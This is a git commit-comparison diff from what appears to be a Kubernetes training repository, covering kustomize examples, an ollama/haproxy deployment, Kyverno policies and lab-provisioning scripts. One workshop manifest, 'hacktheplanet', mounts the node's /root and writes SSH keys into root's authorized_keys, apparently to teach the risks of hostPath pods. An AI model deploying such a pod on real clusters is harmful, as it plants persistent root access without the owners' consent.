Compare commits


2 Commits

Author             SHA1        Message                                              Date
Julien Girardin    6a8e00fc7d  Change last day schedule of Allo Docker for Julien   2023-05-30 15:44:33 +02:00
Jérôme Petazzoni   e8c2b29c8f  ⚛️ HighFive 2023Q2 content update                    2023-05-29 14:54:07 +02:00
256 changed files with 3448 additions and 18081 deletions


@@ -1,26 +0,0 @@
{
"name": "container.training environment to get started with Docker and/or Kubernetes",
"image": "ghcr.io/jpetazzo/shpod",
"features": {
//"ghcr.io/devcontainers/features/common-utils:2": {}
},
// Use 'forwardPorts' to make a list of ports inside the container available locally.
"forwardPorts": [],
//"postCreateCommand": "... install extra packages...",
"postStartCommand": "dind.sh",
// This lets us use "docker-outside-docker".
// Unfortunately, minikube, kind, etc. don't work very well that way;
// so for now, we'll likely use "docker-in-docker" instead (with a
// privileged container). But we're still exposing that socket in case
// someone wants to do something interesting with it.
"mounts": ["source=/var/run/docker.sock,target=/var/run/docker-host.sock,type=bind"],
// This is for docker-in-docker.
"privileged": true,
// Uncomment to connect as root instead. More info: https://aka.ms/dev-containers-non-root.
"remoteUser": "k8s"
}

.gitignore

@@ -9,7 +9,6 @@ prepare-labs/terraform/many-kubernetes/one-kubernetes-config/config.tf
prepare-labs/terraform/many-kubernetes/one-kubernetes-module/*.tf
prepare-labs/terraform/tags
prepare-labs/terraform/virtual-machines/openstack/*.tfvars
prepare-labs/terraform/virtual-machines/proxmox/*.tfvars
prepare-labs/www
slides/*.yml.html


@@ -1,7 +1,7 @@
FROM ruby:alpine
RUN apk add --update build-base curl
RUN gem install sinatra --version '~> 3'
RUN gem install thin --version '~> 1'
RUN gem install sinatra
RUN gem install thin
ADD hasher.rb /
CMD ["ruby", "hasher.rb"]
EXPOSE 80


@@ -1,5 +1,5 @@
FROM node:4-slim
RUN npm install express@4
RUN npm install express
RUN npm install redis@3
COPY files/ /files/
COPY webui.js /


@@ -1,33 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: blue
name: blue
spec:
replicas: 1
selector:
matchLabels:
app: blue
template:
metadata:
labels:
app: blue
spec:
containers:
- image: jpetazzo/color
name: color
---
apiVersion: v1
kind: Service
metadata:
labels:
app: blue
name: blue
spec:
ports:
- name: "80"
port: 80
selector:
app: blue


@@ -16,7 +16,8 @@ spec:
hostPath:
path: /root
tolerations:
- operator: Exists
- effect: NoSchedule
operator: Exists
initContainers:
- name: hacktheplanet
image: alpine
@@ -26,7 +27,7 @@ spec:
command:
- sh
- -c
- "mkdir -p /root/.ssh && apk update && apk add curl && curl https://github.com/jpetazzo.keys >> /root/.ssh/authorized_keys"
- "mkdir -p /root/.ssh && apk update && apk add curl && curl https://github.com/jpetazzo.keys > /root/.ssh/authorized_keys"
containers:
- name: web
image: nginx


@@ -1,12 +0,0 @@
# This removes the haproxy Deployment.
apiVersion: kustomize.config.k8s.io/v1alpha1
kind: Component
patches:
- patch: |-
$patch: delete
kind: Deployment
apiVersion: apps/v1
metadata:
name: haproxy


@@ -1,14 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1alpha1
kind: Component
# Within a Kustomization, it is not possible to specify in which
# order transformations (patches, replacements, etc) should be
# executed. If we want to execute transformations in a specific
# order, one possibility is to put them in individual components,
# and then invoke these components in the order we want.
# It works, but it creates an extra level of indirection, which
# reduces readability and complicates maintenance.
components:
- setup
- cleanup


@@ -1,20 +0,0 @@
global
#log stdout format raw local0
#daemon
maxconn 32
defaults
#log global
timeout client 1h
timeout connect 1h
timeout server 1h
mode http
option abortonclose
frontend metrics
bind :9000
http-request use-service prometheus-exporter
frontend ollama_frontend
bind :8000
default_backend ollama_backend
maxconn 16
backend ollama_backend
server ollama_server localhost:11434 check


@@ -1,39 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: haproxy
name: haproxy
spec:
selector:
matchLabels:
app: haproxy
template:
metadata:
labels:
app: haproxy
spec:
volumes:
- name: haproxy
configMap:
name: haproxy
containers:
- image: haproxy:3.0
name: haproxy
volumeMounts:
- name: haproxy
mountPath: /usr/local/etc/haproxy
readinessProbe:
httpGet:
port: 9000
ports:
- name: haproxy
containerPort: 8000
- name: metrics
containerPort: 9000
resources:
requests:
cpu: 0.05
limits:
cpu: 1


@@ -1,75 +0,0 @@
# This adds a sidecar to the ollama Deployment, by taking
# the pod template and volumes from the haproxy Deployment.
# The idea is to allow running ollama+haproxy in two modes:
# - separately (each with their own Deployment),
# - together in the same Pod, sidecar-style.
# The YAML files define how to run them separately, and this
# "replacements" directive fetches a specific volume and
# a specific container from the haproxy Deployment, to add
# them to the ollama Deployment.
#
# This would be simpler if kustomize allowed appending to or
# merging lists in "replacements"; but it doesn't seem to be
# possible at the moment.
#
# It would be even better if kustomize allowed performing
# a strategic merge using a fieldPath as the source, because
# we could merge both the containers and the volumes in a
# single operation.
#
# Note that technically, it might be possible to layer
# multiple kustomizations so that one generates the patch
# to be used in another; but it wouldn't be very readable
# or maintainable so we decided to not do that right now.
#
# However, the current approach (fetching fields one by one)
# has an advantage: it could let us transform the haproxy
# container into a real sidecar (i.e. an initContainer with
# a restartPolicy=Always).
apiVersion: kustomize.config.k8s.io/v1alpha1
kind: Component
resources:
- haproxy.yaml
configMapGenerator:
- name: haproxy
files:
- haproxy.cfg
replacements:
- source:
kind: Deployment
name: haproxy
fieldPath: spec.template.spec.volumes.[name=haproxy]
targets:
- select:
kind: Deployment
name: ollama
fieldPaths:
- spec.template.spec.volumes.[name=haproxy]
options:
create: true
- source:
kind: Deployment
name: haproxy
fieldPath: spec.template.spec.containers.[name=haproxy]
targets:
- select:
kind: Deployment
name: ollama
fieldPaths:
- spec.template.spec.containers.[name=haproxy]
options:
create: true
- source:
kind: Deployment
name: haproxy
fieldPath: spec.template.spec.containers.[name=haproxy].ports.[name=haproxy].containerPort
targets:
- select:
kind: Service
name: ollama
fieldPaths:
- spec.ports.[name=11434].targetPort
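
The last remark in the comment above (turning haproxy into a "real sidecar") would boil down to moving the haproxy container into initContainers with restartPolicy: Always. Here is a rough sketch of what that pod template fragment might look like, reusing the names from the haproxy manifests above; this only illustrates the native sidecar pattern (Kubernetes 1.29 and later), it is not something generated by this component:

# Sketch only: haproxy injected as a native sidecar instead of a regular container.
spec:
  template:
    spec:
      initContainers:
      - name: haproxy
        image: haproxy:3.0
        restartPolicy: Always    # this is what turns the init container into a sidecar
        volumeMounts:
        - name: haproxy
          mountPath: /usr/local/etc/haproxy
        ports:
        - name: haproxy
          containerPort: 8000
      containers:
      - name: ollama
        image: ollama/ollama
      volumes:
      - name: haproxy
        configMap:
          name: haproxy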


@@ -1,34 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: blue
name: blue
spec:
replicas: 2
selector:
matchLabels:
app: blue
template:
metadata:
labels:
app: blue
spec:
containers:
- image: jpetazzo/color
name: color
ports:
- containerPort: 80
---
apiVersion: v1
kind: Service
metadata:
labels:
app: blue
name: blue
spec:
ports:
- port: 80
selector:
app: blue


@@ -1,94 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
# Each of these YAML files contains a Deployment and a Service.
# The blue.yaml file is here just to demonstrate that the rest
# of this Kustomization can be precisely scoped to the ollama
# Deployment (and Service): the blue Deployment and Service
# shouldn't be affected by our kustomize transformers.
resources:
- ollama.yaml
- blue.yaml
buildMetadata:
# Add a label app.kubernetes.io/managed-by=kustomize-vX.Y.Z
- managedByLabel
# Add an annotation config.kubernetes.io/origin, indicating:
# - which file defined that resource;
# - if it comes from a git repository, which one, and which
# ref (tag, branch...) it was.
- originAnnotations
# Add an annotation alpha.config.kubernetes.io/transformations
# indicating which patches and other transformers have changed
# each resource.
- transformerAnnotations
# Let's generate a ConfigMap with literal values.
# Note that this will actually add a suffix to the name of the
# ConfigMaps (e.g.: ollama-8bk8bd8m76) and it will update all
# references to the ConfigMap (e.g. in Deployment manifests)
# accordingly. The suffix is a hash of the ConfigMap contents,
# so that basically, if the ConfigMap is edited, any workload
# using that ConfigMap will automatically do a rolling update.
configMapGenerator:
- name: ollama
literals:
- "model=gemma3:270m"
- "prompt=If you visit Paris, I suggest that you"
- "queue=4"
name: ollama
patches:
# The Deployment manifest in ollama.yaml doesn't specify
# resource requests and limits, so that it can run on any
# cluster (including resource-constrained local clusters
# like KiND or minikube). The example below adds CPU
# requests and limits using a strategic merge patch.
# The patch is inlined here, but it could also be put
# in a file and referenced with "path: xxxxxx.yaml".
- patch: |
apiVersion: apps/v1
kind: Deployment
metadata:
name: ollama
spec:
template:
spec:
containers:
- name: ollama
resources:
requests:
cpu: 1
limits:
cpu: 2
# This will have the same effect, with one little detail:
# JSON patches cannot specify containers by name, so this
# assumes that the ollama container is the first one in
# the pod template (whereas the strategic merge patch can
# use "merge keys" and identify containers by their name).
#- target:
# kind: Deployment
# name: ollama
# patch: |
# - op: add
# path: /spec/template/spec/containers/0/resources
# value:
# requests:
# cpu: 1
# limits:
# cpu: 2
# A "component" is a bit like a "base", in the sense that
# it lets us define some reusable resources and behaviors.
# There is a key difference, though:
# - a "base" will be evaluated in isolation: it will
# generate+transform some resources, then these resources
# will be included in the main Kustomization;
# - a "component" has access to all the resources that
# have been generated by the main Kustomization, which
# means that it can transform them (with patches etc).
components:
- add-haproxy-sidecar
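
To make the configMapGenerator comment above concrete: after a kustomize build, the generated ConfigMap carries a content-hash suffix, and every reference to it is rewritten to match. A sketch of what the rendered output might look like (the suffix shown is just the example value from the comment, not an actual hash):

# Sketch only: the generated ConfigMap with its hash suffix...
apiVersion: v1
kind: ConfigMap
metadata:
  name: ollama-8bk8bd8m76   # suffix is a hash of the ConfigMap contents
data:
  model: "gemma3:270m"
  prompt: "If you visit Paris, I suggest that you"
  queue: "4"
---
# ...and the matching reference in the ollama Deployment is rewritten too (excerpt):
env:
- name: MODEL
  valueFrom:
    configMapKeyRef:
      name: ollama-8bk8bd8m76
      key: model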


@@ -1,73 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: ollama
name: ollama
spec:
selector:
matchLabels:
app: ollama
template:
metadata:
labels:
app: ollama
spec:
volumes:
- name: ollama
hostPath:
path: /opt/ollama
type: DirectoryOrCreate
containers:
- image: ollama/ollama
name: ollama
env:
- name: OLLAMA_MAX_QUEUE
valueFrom:
configMapKeyRef:
name: ollama
key: queue
- name: MODEL
valueFrom:
configMapKeyRef:
name: ollama
key: model
volumeMounts:
- name: ollama
mountPath: /root/.ollama
lifecycle:
postStart:
exec:
command:
- /bin/sh
- -c
- ollama pull $MODEL
livenessProbe:
httpGet:
port: 11434
readinessProbe:
exec:
command:
- /bin/sh
- -c
- ollama show $MODEL
ports:
- name: ollama
containerPort: 11434
---
apiVersion: v1
kind: Service
metadata:
labels:
app: ollama
name: ollama
spec:
ports:
- name: "11434"
port: 11434
protocol: TCP
targetPort: 11434
selector:
app: ollama
type: ClusterIP


@@ -1,5 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- microservices
- redis


@@ -1,13 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- microservices.yaml
transformers:
- |
apiVersion: builtin
kind: PrefixSuffixTransformer
metadata:
name: use-ghcr-io
prefix: ghcr.io/
fieldSpecs:
- path: spec/template/spec/containers/image


@@ -1,125 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: hasher
name: hasher
spec:
replicas: 1
selector:
matchLabels:
app: hasher
template:
metadata:
labels:
app: hasher
spec:
containers:
- image: dockercoins/hasher:v0.1
name: hasher
---
apiVersion: v1
kind: Service
metadata:
labels:
app: hasher
name: hasher
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: hasher
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: rng
name: rng
spec:
replicas: 1
selector:
matchLabels:
app: rng
template:
metadata:
labels:
app: rng
spec:
containers:
- image: dockercoins/rng:v0.1
name: rng
---
apiVersion: v1
kind: Service
metadata:
labels:
app: rng
name: rng
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: rng
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: webui
name: webui
spec:
replicas: 1
selector:
matchLabels:
app: webui
template:
metadata:
labels:
app: webui
spec:
containers:
- image: dockercoins/webui:v0.1
name: webui
---
apiVersion: v1
kind: Service
metadata:
labels:
app: webui
name: webui
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: webui
type: NodePort
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: worker
name: worker
spec:
replicas: 1
selector:
matchLabels:
app: worker
template:
metadata:
labels:
app: worker
spec:
containers:
- image: dockercoins/worker:v0.1
name: worker


@@ -1,4 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- redis.yaml


@@ -1,35 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: redis
name: redis
spec:
replicas: 1
selector:
matchLabels:
app: redis
template:
metadata:
labels:
app: redis
spec:
containers:
- image: redis
name: redis
---
apiVersion: v1
kind: Service
metadata:
labels:
app: redis
name: redis
spec:
ports:
- port: 6379
protocol: TCP
targetPort: 6379
selector:
app: redis
type: ClusterIP


@@ -1,160 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: hasher
name: hasher
spec:
replicas: 1
selector:
matchLabels:
app: hasher
template:
metadata:
labels:
app: hasher
spec:
containers:
- image: dockercoins/hasher:v0.1
name: hasher
---
apiVersion: v1
kind: Service
metadata:
labels:
app: hasher
name: hasher
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: hasher
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: redis
name: redis
spec:
replicas: 1
selector:
matchLabels:
app: redis
template:
metadata:
labels:
app: redis
spec:
containers:
- image: redis
name: redis
---
apiVersion: v1
kind: Service
metadata:
labels:
app: redis
name: redis
spec:
ports:
- port: 6379
protocol: TCP
targetPort: 6379
selector:
app: redis
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: rng
name: rng
spec:
replicas: 1
selector:
matchLabels:
app: rng
template:
metadata:
labels:
app: rng
spec:
containers:
- image: dockercoins/rng:v0.1
name: rng
---
apiVersion: v1
kind: Service
metadata:
labels:
app: rng
name: rng
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: rng
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: webui
name: webui
spec:
replicas: 1
selector:
matchLabels:
app: webui
template:
metadata:
labels:
app: webui
spec:
containers:
- image: dockercoins/webui:v0.1
name: webui
---
apiVersion: v1
kind: Service
metadata:
labels:
app: webui
name: webui
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: webui
type: NodePort
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: worker
name: worker
spec:
replicas: 1
selector:
matchLabels:
app: worker
template:
metadata:
labels:
app: worker
spec:
containers:
- image: dockercoins/worker:v0.1
name: worker


@@ -1,30 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- dockercoins.yaml
replacements:
- sourceValue: ghcr.io/dockercoins
targets:
- select:
kind: Deployment
labelSelector: "app in (hasher,rng,webui,worker)"
# It will soon be possible to use regexes in replacement selectors,
# meaning that the "labelSelector:" above can be replaced with the
# following "name:" selector which is a tiny bit simpler:
#name: hasher|rng|webui|worker
# Regex support in replacement selectors was added by this PR:
# https://github.com/kubernetes-sigs/kustomize/pull/5863
# This PR was merged in August 2025, but as of October 2025, the
# latest release of Kustomize is 5.7.1, which was released in July.
# Hopefully the feature will be available in the next release :)
# Another possibility would be to select all Deployments, and then
# reject the one(s) for which we don't want to update the registry;
# for instance:
#reject:
# kind: Deployment
# name: redis
fieldPaths:
- spec.template.spec.containers.*.image
options:
delimiter: "/"
index: 0
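
To illustrate the delimiter/index options above: the target image field is split on "/", and segment 0 is replaced with the source value, which effectively prepends the ghcr.io registry while keeping the rest of the image reference. A sketch of the effect on one of the dockercoins Deployments, assuming the source value is applied literally:

# Before the replacement (from dockercoins.yaml):
      containers:
      - image: dockercoins/hasher:v0.1
        name: hasher
# After the replacement ("dockercoins" is replaced by "ghcr.io/dockercoins"):
      containers:
      - image: ghcr.io/dockercoins/hasher:v0.1
        name: hasher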


@@ -3,6 +3,7 @@ kind: ClusterPolicy
metadata:
name: pod-color-policy-1
spec:
validationFailureAction: enforce
rules:
- name: ensure-pod-color-is-valid
match:
@@ -17,6 +18,5 @@ spec:
operator: NotIn
values: [ red, green, blue ]
validate:
failureAction: Enforce
message: "If it exists, the label color must be red, green, or blue."
deny: {}


@@ -3,6 +3,7 @@ kind: ClusterPolicy
metadata:
name: pod-color-policy-2
spec:
validationFailureAction: enforce
background: false
rules:
- name: prevent-color-change
@@ -21,7 +22,6 @@ spec:
operator: NotEquals
value: ""
validate:
failureAction: Enforce
message: "Once label color has been added, it cannot be changed."
deny:
conditions:


@@ -3,6 +3,7 @@ kind: ClusterPolicy
metadata:
name: pod-color-policy-3
spec:
validationFailureAction: enforce
background: false
rules:
- name: prevent-color-change
@@ -21,6 +22,7 @@ spec:
operator: Equals
value: ""
validate:
failureAction: Enforce
message: "Once label color has been added, it cannot be removed."
deny: {}
deny:
conditions:


@@ -1,13 +0,0 @@
apiVersion: policy/v1
kind: PodDisruptionBudget
metadata:
name: my-pdb
spec:
#minAvailable: 2
#minAvailable: 90%
maxUnavailable: 1
#maxUnavailable: 10%
selector:
matchLabels:
app: my-app


@@ -1,27 +0,0 @@
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: sysctl
spec:
selector:
matchLabels:
app: sysctl
template:
metadata:
labels:
app: sysctl
spec:
tolerations:
- operator: Exists
initContainers:
- name: sysctl
image: alpine
securityContext:
privileged: true
command:
- sysctl
- fs.inotify.max_user_instances=99999
containers:
- name: pause
image: registry.k8s.io/pause:3.8


@@ -59,27 +59,6 @@ You don't **have to** install the CLI tools of the cloud provider(s) that you wa
If you want to provide your cloud credentials through other means, you will have to adjust the Terraform configuration files in `terraform/provider-config` accordingly.
Here is where we look for credentials for each provider:
- AWS: Terraform defaults; see [AWS provider documentation][creds-aws] (for instance, you can use the `AWS_ACCESS_KEY_ID` and `AWS_SECRET_ACCESS_KEY` environment variables, or AWS config and profile files)
- Azure: Terraform defaults; see [AzureRM provider documentation][creds-azure] (typically, you can authenticate with the `az` CLI and Terraform will pick it up automatically)
- Civo: CLI configuration file (`~/.civo.json`)
- Digital Ocean: CLI configuration file (`~/.config/doctl/config.yaml`)
- Exoscale: CLI configuration file (`~/.config/exoscale/exoscale.toml`)
- Google Cloud: we're using "Application Default Credentials (ADC)"; run `gcloud auth application-default login`; note that we'll use the default "project" set in `gcloud` unless you set the `GOOGLE_PROJECT` environment variable
- Hetzner: CLI configuration file (`~/.config/hcloud/cli.toml`)
- Linode: CLI configuration file (`~/.config/linode-cli`)
- OpenStack: you will need to write a tfvars file (check [that example](terraform/virtual-machines/openstack/tfvars.example))
- Oracle: Terraform defaults; see [OCI provider documentation][creds-oci] (for instance, you can set up API keys; or you can use a short-lived token generated by the OCI CLI with `oci session authenticate`)
- OVH: Terraform defaults; see [OVH provider documentation][creds-ovh] (this typically involves setting up 5 `OVH_...` environment variables)
- Scaleway: Terraform defaults; see [Scaleway provider documentation][creds-scw] (for instance, you can set environment variables, but it will also automatically pick up CLI authentication from `~/.config/scw/config.yaml`)
[creds-aws]: https://registry.terraform.io/providers/hashicorp/aws/latest/docs#authentication-and-configuration
[creds-azure]: https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs#authenticating-to-azure
[creds-oci]: https://docs.oracle.com/en-us/iaas/Content/API/SDKDocs/terraformproviderconfiguration.htm#authentication
[creds-ovh]: https://registry.terraform.io/providers/ovh/ovh/latest/docs#provider-configuration
[creds-scw]: https://registry.terraform.io/providers/scaleway/scaleway/latest/docs#authentication
## General Workflow
- fork/clone repo


@@ -21,11 +21,6 @@ digitalocean-pvc)
jq '.[] | select(.name | startswith("pvc-")) | .id' |
xargs -n1 -P10 doctl compute volume delete --force
;;
scaleway-pvc)
scw instance volume list --output json |
jq '.[] | select(.name | contains("_pvc-")) | .id' |
xargs -n1 -P10 scw instance volume delete
;;
*)
echo "Unknown combination of provider ('$1') and resource ('$2')."
;;


@@ -10,22 +10,13 @@ fi
. ~/creds/creds.cloudflare.dns
cloudflare() {
case "$1" in
GET|POST|DELETE)
METHOD="$1"
shift
;;
*)
METHOD=""
;;
esac
URI=$1
shift
http --ignore-stdin $METHOD https://api.cloudflare.com/client/v4/$URI "$@" "Authorization:Bearer $CLOUDFLARE_TOKEN"
http https://api.cloudflare.com/client/v4/$URI "$@" "Authorization:Bearer $CLOUDFLARE_TOKEN"
}
_list_zones() {
cloudflare zones?per_page=100 | jq -r .result[].name
cloudflare zones | jq -r .result[].name
}
_get_zone_id() {
@@ -41,15 +32,6 @@ _populate_zone() {
done
}
_clear_zone() {
ZONE_ID=$(_get_zone_id $1)
for RECORD_ID in $(
cloudflare zones/$ZONE_ID/dns_records | jq -r .result[].id
); do
cloudflare DELETE zones/$ZONE_ID/dns_records/$RECORD_ID
done
}
_add_zone() {
cloudflare zones "name=$1"
}


@@ -1,9 +1,7 @@
#!/bin/sh
set -eu
# https://open-api.netlify.com/#tag/dnsZone
[ "${1-}" ] || {
[ "$1" ] || {
echo ""
echo "Add a record in Netlify DNS."
echo "This script is hardcoded to add a record to container.training".
@@ -14,13 +12,13 @@ set -eu
echo "$0 del <recordid>"
echo ""
echo "Example to create a A record for eu.container.training:"
echo "$0 add eu A 185.145.250.0"
echo "$0 add eu 185.145.250.0"
echo ""
exit 1
}
NETLIFY_CONFIG_FILE=~/.config/netlify/config.json
if ! [ "${DOMAIN-}" ]; then
if ! [ "$DOMAIN" ]; then
DOMAIN=container.training
fi
@@ -51,29 +49,27 @@ ZONE_ID=$(netlify dns_zones |
_list() {
netlify dns_zones/$ZONE_ID/dns_records |
jq -r '.[] | select(.type=="A" or .type=="AAAA") | [.hostname, .type, .value, .id] | @tsv' |
sort |
column --table
jq -r '.[] | select(.type=="A") | [.hostname, .type, .value, .id] | @tsv'
}
_add() {
NAME=$1.$DOMAIN
TYPE=$2
VALUE=$3
ADDR=$2
# It looks like if we create two identical records, then delete one of them,
# Netlify DNS ends up in a weird state (the name doesn't resolve anymore even
# though it's still visible through the API and the website?)
if netlify dns_zones/$ZONE_ID/dns_records |
jq '.[] | select(.hostname=="'$NAME'" and .type=="'$TYPE'" and .value=="'$VALUE'")' |
jq '.[] | select(.hostname=="'$NAME'" and .type=="A" and .value=="'$ADDR'")' |
grep .
then
echo "It looks like that record already exists. Refusing to create it."
exit 1
fi
netlify dns_zones/$ZONE_ID/dns_records type=$TYPE hostname=$NAME value=$VALUE ttl=300
netlify dns_zones/$ZONE_ID/dns_records type=A hostname=$NAME value=$ADDR ttl=300
netlify dns_zones/$ZONE_ID/dns_records |
jq '.[] | select(.hostname=="'$NAME'")'
@@ -92,7 +88,7 @@ case "$1" in
_list
;;
add)
_add $2 $3 $4
_add $2 $3
;;
del)
_del $2


@@ -1,62 +1,19 @@
#!/bin/sh
#
# Baseline resource usage per vcluster in our use case:
# 500 MB RAM
# 10% CPU
# (See https://docs.google.com/document/d/1n0lwp6rQKQUIuo_A5LQ1dgCzrmjkDjmDtNj1Jn92UrI)
# PRO2-XS = 4 core, 16 gb
#
# With vspod:
# 800 MB RAM
# 33% CPU
#
set -e
KONKTAG=konk
PROVIDER=linode
STUDENTS=5
case "$PROVIDER" in
linode)
export TF_VAR_node_size=g6-standard-6
export TF_VAR_location=fr-par
;;
scaleway)
export TF_VAR_node_size=PRO2-XS
# For tiny testing purposes, these are okay too:
#export TF_VAR_node_size=PLAY2-NANO
export TF_VAR_location=fr-par-2
;;
esac
# deploy big cluster
TF_VAR_node_size=g6-standard-6 \
TF_VAR_nodes_per_cluster=5 \
TF_VAR_location=eu-west \
./labctl create --mode mk8s --settings settings/mk8s.env --provider linode --tag konk
# set kubeconfig file
export KUBECONFIG=~/kubeconfig
if [ "$PROVIDER" = "kind" ]; then
kind create cluster --name $KONKTAG
ADDRTYPE=InternalIP
else
if ! [ -f tags/$KONKTAG/stage2/kubeconfig.101 ]; then
./labctl create --mode mk8s --settings settings/konk.env --provider $PROVIDER --tag $KONKTAG
fi
cp tags/$KONKTAG/stage2/kubeconfig.101 $KUBECONFIG
ADDRTYPE=ExternalIP
fi
cp tags/konk/stage2/kubeconfig.101 ~/kubeconfig
# set external_ip labels
kubectl get nodes -o=jsonpath='{range .items[*]}{.metadata.name} {.status.addresses[?(@.type=="'$ADDRTYPE'")].address}{"\n"}{end}' |
while read node address ignoredaddresses; do
kubectl get nodes -o=jsonpath='{range .items[*]}{.metadata.name} {.status.addresses[?(@.type=="ExternalIP")].address}{"\n"}{end}' |
while read node address; do
kubectl label node $node external_ip=$address
done
# vcluster all the things
./labctl create --settings settings/mk8s.env --provider vcluster --mode mk8s --students $STUDENTS
# install prometheus stack because that's cool
helm upgrade --install --repo https://prometheus-community.github.io/helm-charts \
--namespace prom-system --create-namespace \
kube-prometheus-stack kube-prometheus-stack
# and also fix sysctl
kubectl apply -f ../k8s/sysctl.yaml --namespace kube-system
./labctl create --settings settings/mk8s.env --provider vcluster --mode mk8s --students 27


@@ -57,7 +57,7 @@ need_tag() {
if [ ! -d "tags/$TAG" ]; then
die "Tag $TAG not found (directory tags/$TAG does not exist)."
fi
for FILE in mode provider settings.env status; do
for FILE in settings.env ips.txt; do
if [ ! -f "tags/$TAG/$FILE" ]; then
warning "File tags/$TAG/$FILE not found."
fi


@@ -19,22 +19,20 @@ _cmd_cards() {
TAG=$1
need_tag
OPTIONS_FILE=$2
[ -f "$OPTIONS_FILE" ] || die "Please specify a YAML options file as 2nd argument."
OPTIONS_FILE_PATH="$(readlink -f "$OPTIONS_FILE")"
die FIXME
# This will process logins.jsonl to generate two files: cards.pdf and cards.html
# This will process ips.txt to generate two files: ips.pdf and ips.html
(
cd tags/$TAG
../../../lib/make-login-cards.py "$OPTIONS_FILE_PATH"
../../../lib/ips-txt-to-html.py settings.yaml
)
ln -sf ../tags/$TAG/cards.html www/$TAG.html
ln -sf ../tags/$TAG/cards.pdf www/$TAG.pdf
ln -sf ../tags/$TAG/ips.html www/$TAG.html
ln -sf ../tags/$TAG/ips.pdf www/$TAG.pdf
info "Cards created. You can view them with:"
info "xdg-open tags/$TAG/cards.html tags/$TAG/cards.pdf (on Linux)"
info "open tags/$TAG/cards.html (on macOS)"
info "xdg-open tags/$TAG/ips.html tags/$TAG/ips.pdf (on Linux)"
info "open tags/$TAG/ips.html (on macOS)"
info "Or you can start a web server with:"
info "$0 www"
}
@@ -49,41 +47,6 @@ _cmd_clean() {
done
}
_cmd codeserver "Install code-server on the clusters"
_cmd_codeserver() {
TAG=$1
need_tag
ARCH=${ARCHITECTURE-amd64}
CODESERVER_VERSION=4.96.4
CODESERVER_URL=https://github.com/coder/code-server/releases/download/v${CODESERVER_VERSION}/code-server-${CODESERVER_VERSION}-linux-${ARCH}.tar.gz
pssh "
set -e
i_am_first_node || exit 0
if ! [ -x /usr/local/bin/code-server ]; then
curl -fsSL $CODESERVER_URL | sudo tar zx -C /opt
sudo ln -s /opt/code-server-${CODESERVER_VERSION}-linux-${ARCH}/bin/code-server /usr/local/bin/code-server
sudo -u $USER_LOGIN -H code-server --install-extension ms-azuretools.vscode-docker
sudo -u $USER_LOGIN -H code-server --install-extension ms-kubernetes-tools.vscode-kubernetes-tools
sudo -u $USER_LOGIN -H mkdir -p /home/$USER_LOGIN/.local/share/code-server/User
echo '{\"workbench.startupEditor\": \"terminal\"}' | sudo -u $USER_LOGIN tee /home/$USER_LOGIN/.local/share/code-server/User/settings.json
sudo -u $USER_LOGIN mkdir -p /home/$USER_LOGIN/.config/systemd/user
sudo -u $USER_LOGIN tee /home/$USER_LOGIN/.config/systemd/user/code-server.service <<EOF
[Unit]
Description=code-server
[Install]
WantedBy=default.target
[Service]
ExecStart=/usr/local/bin/code-server --bind-addr [::]:1789
Restart=always
EOF
sudo systemctl --user -M $USER_LOGIN@ enable code-server.service --now
sudo loginctl enable-linger $USER_LOGIN
fi"
}
_cmd createuser "Create the user that students will use"
_cmd_createuser() {
TAG=$1
@@ -163,7 +126,6 @@ set number
set shiftwidth=2
set softtabstop=2
set nowrap
set laststatus=2
SQRL
pssh -I "sudo -u $USER_LOGIN tee /home/$USER_LOGIN/.tmux.conf" <<SQRL
@@ -270,27 +232,7 @@ _cmd_create() {
ln -s ../../$SETTINGS tags/$TAG/settings.env.orig
cp $SETTINGS tags/$TAG/settings.env
# For Google Cloud, it is necessary to specify which "project" to use.
# Unfortunately, the Terraform provider doesn't seem to have a way
# to detect which Google Cloud project you want to use; it has to be
# specified one way or another. Let's decide that it should be set with
# the GOOGLE_PROJECT env var; and if that var is not set, we'll try to
# figure it out from gcloud.
# (See https://github.com/hashicorp/terraform-provider-google/issues/10907#issuecomment-1015721600)
# Since we need that variable to be set each time we'll call Terraform
# (e.g. when destroying the environment), let's save it to the settings.env
# file.
if [ "$PROVIDER" = "googlecloud" ]; then
if ! [ "$GOOGLE_PROJECT" ]; then
info "PROVIDER=googlecloud but GOOGLE_PROJECT is not set. Detecting it."
GOOGLE_PROJECT=$(gcloud config get project)
info "GOOGLE_PROJECT will be set to '$GOOGLE_PROJECT'."
fi
echo "export GOOGLE_PROJECT=$GOOGLE_PROJECT" >> tags/$TAG/settings.env
fi
. tags/$TAG/settings.env
. $SETTINGS
echo $MODE > tags/$TAG/mode
